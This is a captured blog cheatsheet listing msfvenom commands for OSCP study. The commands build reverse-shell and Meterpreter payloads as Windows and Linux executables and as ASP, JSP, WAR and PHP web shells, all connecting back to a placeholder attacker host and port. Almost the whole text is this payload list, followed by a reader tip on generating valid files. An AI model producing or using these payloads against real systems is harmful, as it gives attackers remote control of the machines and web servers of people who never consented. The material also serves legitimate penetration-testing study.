Payload e Backdor

You might also like

Download as pdf or txt
Download as pdf or txt
You are on page 1of 4

19/01/2022 02:07 MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) | Infinite Logins

Infinite Logins

TIPS & TRICKS

MSFVenom Reverse Shell Payload Cheatsheet


(with & without Meterpreter)
Posted on January 25, 2020June 1, 2021 by Harley in Tips & Tricks

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter
shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP.

Table of Contents:
– Non Meterpreter Binaries
– Non Meterpreter Web Payloads
– Meterpreter Binaries
– Meterpreter Web Payloads

Non-Meterpreter Binaries

Staged Payloads for Windows

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe


x86
> shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
x64
exe > shell-x64.exe

Stageless Payloads for Windows

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe


x86
> shell-x86.exe

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ 1/4
19/01/2022 02:07 MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) | Infinite Logins

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe


x64
> shell-x64.exe

Staged Payloads for Linux

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f


x86
elf > shell-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f
x64
elf > shell-x64.elf

Stageless Payloads for Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f


x86
elf > shell-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
x64
elf > shell-x64.elf

Non-Meterpreter Web Payloads

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp


asp
> shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
jsp
raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
war
war > shell.war
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw >
php
shell.php

Meterpreter Binaries

Staged Payloads for Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT>


x86
-f exe > shell-x86.exe

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ 2/4
19/01/2022 02:07 MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) | Infinite Logins

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=


x64
<PORT> -f exe > shell-x64.exe

Stageless Payloads for Windows

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT>


x86
-f exe > shell-x86.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=
x64
<PORT> -f exe > shell-x64.exe

Staged Payloads for Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=


x86
<PORT> -f elf > shell-x86.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=
x64
<PORT> -f elf > shell-x64.elf

Stageless Payloads for Linux

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=


x86
<PORT> -f elf > shell-x86.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=
x64
<PORT> -f elf > shell-x64.elf

Meterpreter Web Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT>


asp
-f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
jsp
raw > example.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
war
war > example.war
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f
php
raw > shell.php

Donations and Support:


Like my content? Please consider supporting me on Patreon:
https://www.patreon.com/infinitelogins

Purchase a VPN Using my Affiliate Link


https://www.privateinternetaccess.com/pages/buy-vpn/infinitelogins

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ 3/4
👇 SUBSCRIBE TO INFINITELOGINS YOUTUBE CHANNEL NOW 👇
19/01/2022 02:07 MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) | Infinite Logins

https://www.youtube.com/c/infinitelogins?sub_confirmation=1

JSP METASPLOIT METERPRETER MSFVENOM PAYLOADS PHP WINDO


WS
4

4 thoughts on “MSFVenom Reverse Shell Payload


Cheatsheet (with & without Meterpreter)”

1. Pingback: Hack the Box Write-Up: NINEVAH (Without Metasploit) | Infinite Logins
2. Pingback: Abusing Local Privilege Escalation Vulnerability in Liongard ROAR <1.9.76 | Infinite Logins
3. Pingback: Writeup – CSL – Boats – Actual Tom

4. g33kdawg
says:
July 24, 2020 at 11:59 am
PSA: run these commands via cmd.exe, not in Powershell. Powershell output seems to do some sort of
encoding that will generate an invalid PE file when you redirect the output to file, but running these under
cmd.exe works correctly.

(Windows 10 1809)

Reply

Powered by WordPress.com.

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ 4/4

You might also like